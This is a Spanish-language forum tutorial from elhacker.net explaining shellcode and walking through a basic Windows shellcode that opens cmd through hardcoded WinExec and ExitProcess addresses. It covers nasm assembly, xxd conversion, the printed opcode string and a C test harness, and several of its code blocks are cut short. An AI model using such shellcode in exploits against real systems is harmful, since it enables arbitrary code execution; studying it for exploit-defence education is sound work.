Que es una shellcode? Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Una shellcode es basicamente una serie de ordenes en ensamblador que hace al- go de la cual sacamos provecho; ejecutar /bin/sh para obtener una shell, co- piar una shell y setearla con suid root, etc. Tiene unas caracteristicas de programacion un tanto especiales que luego veremos en detalle. Se usa para conseguir ejecutar un codigo despues de haber sobreescrito la di- reccion de retorno de un programa/funcion mediante un overflow, o mediante cualquier otro metodo valido. Es decir, el valor de la direccion de retorno que se sobreescribira sera la de nuestra shellcode. No me meto mucho en esto porque la finalidad de este texto no es como programar un xploit de buffer overflow, sino una shellcode. Simplemente decir que cuando se produzca el desbordamiento y el salto se ejecutara nuestra shellcode. Creando una Shellcode en Windows by lShadowl Introduccion Este tutorial pretende exponer de una manera clara y bastante simple el procedimiento para codificar una shellcode basica. Podemos dividir el proceso en 2 partes: codificacion en ensamblador y conversion a opcode. El objetivo del tutorial es crear una shellcode que abra una cmd. Todas las herramientas usadas en este tutorial pueden ser descargadas desde la plataforma Cygwin la cual es un emulador de sistemas Unix para Windows. La lista de las paquetes minimos ha descargar pasar seguir el tutorial es: -----Categoria Devel---- >binutils >gcc >nasm ----Categoria System---- >util-linux Otras herramientas y scripts usados estan como codigo fuente en el tutorial. Codificacion en ensamblador Para esta parte necesitaremos saber que funciones vamos a utilizar para cumplir el proposito (abrir la cmd). En nuestro caso necesitaremos el acceso a las funciones "WinExec" [con que ejecutaremos la cmd] y "ExitProcess" [con la cual saldremos del programa], ambas se encuentran en la dll "kernel32". Para utilizarlas al codificar necesitamos saber su offset, para esto usaremos a "arwin", un programa bastante sencillo que nos devuelve especificamente lo que buscamos, la direccion de la funcion. Aqui su codigo: Código #include <windows.h> Es necesario saber la direccion de la funcion que utilizaremos ya que esta cambia a partir de las versiones del sistema operativo y sus Service Packs. Ya con arwin usaremos la linea: $ arwin kernel32.dll WinExec con lo cual obtendremos un resultado parecido a esto: ![]() El mismo proceso para buscar "ExitProcess"... ![]() Ahora que tenemos las direcciones, pasemos al code en asm. Código BITS 32 ;especificamos que el code es 32bits (Entremedio) Como pusiste a cmd en la pila, no veo ni un push? La respuesta a esta pregunta reside en el comportamiento de la instrucción 'call' en conjunto con la instrucción 'ret'>> CALL lo que hace es introducir IP+1 en la pila, ósea la instrucción que sigue al CALL, y salta a la dirección que se le indica, RET toma el valor que introduce el CALL en la pila, y salta a el. Conversion a opcode Bien, ya que tenemos el codigo listo en shc.asm lo pasaremos ha codigo objeto. Para esto usaremos nasm asi: $ nasm -f bin -o shc.bin shc.asm En shc.bin tendremos algo como esto: ?.??#?|????|???????cmd luego, usaremos la herramienta xxd para pasarlo a opcode, de esta forma: $ xxd -i shc.asm y nos devolvera esto: ![]() Y listo, tenemos nuestra shellcode lista en C: Código unsigned char shc_bin[] = { Ahora, hay scripts que nos permiten tener otro tipo de salida del opcode, veamos este: Código #!/bin/bash De esta forma:: $ xxd-shellcode.sh shc.bin Devolverá esto: ![]() y en shc.shellcode los opcodes \xeb\x0e\xba\xad\x23\x86\x7c\xff\xd2\xba\xfa\xca\x81\x7c\xff\xd2\xe8\xed\xff\xff\xff\x63\x6d\x64 Ahora veamos la plantilla en C para probarla -------------------------- Código char code[] = "[b]OPCODES[/b]";-------------------------- Asi que tendriamos en sch.c ...: Código char code[] = "\xeb\x0e\xba\xad\x23\x86\x7c\xff\xd2\xba\xfa\xca\x81\x7c\xff\xd2\xe8\xed\xff\xff\xff\x63\x6d\x64\x00"; ![]() Saludos! _______________________________________________________________________________________________________________ Post original de lShadowl : URL Sagrini : elhacker.net 2011 |
Bugs y Exploits > Overflows y Shellcodes >